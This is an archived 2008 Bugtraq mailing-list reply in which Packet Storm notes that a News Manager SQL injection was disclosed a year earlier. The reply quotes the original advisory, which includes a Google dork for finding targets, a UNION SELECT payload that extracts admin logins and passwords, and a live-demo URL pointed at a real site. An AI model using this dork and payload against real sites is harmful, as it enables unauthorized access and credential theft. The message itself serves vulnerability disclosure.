| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 9 Oct 2008 18:20:30 -0400 From: packet@...ketstormsecurity.org To: Ghost hacker <ghost-r00t@...mail.com> Cc: ستروك <submit@...w0rm.com>, السيكروتي فوكس <bugtraq@...urityfocus.com> Subject: Re: News Manager Remote SQL Injection Vulnerability Discovered over a year ago. http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a remote SQL injection vulnerability. Homepage: <a href="http://www.cyber-security.org/" target="ext">http://www.cyber-security.org/.</a> On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote: > > #################################################################################################### > # News Manager Remote SQL Injection Vulnerability # > # © Ghost Hacker , Real Hack Back :) # > #################################################################################################### > #[~] Author : Ghost Hacker # > #[~] Home page : www.Real-h.com [Real Hack Back] # > #[~] Contact Me : Ghost-r00t@...mail.com # > #[~] Bug : SQL Injection # > #[~] From : Kingdom Saudi Arabia # > #[~] Name Script : News Manager # > #[~] Download : http://www.preprojects.com/news.asp # > #################################################################################################### > #[~] Dork : # > # ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid= # > #[~] Exploit : # > # http://xxxx/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- > #[~] live demo : # > # http://www.preproject.com/news manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- > #################################################################################################### > #[~]Greets : # > # Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , L&J TeaM # > # Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com # > # All Members Real Hack , All My Friends :) # > #################################################################################################### > # Viva Real Hack - Real-h.com .. # > #################################################################################################### > _________________________________________________________________ > Express yourself instantly with MSN Messenger! Download today it's FREE! > http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists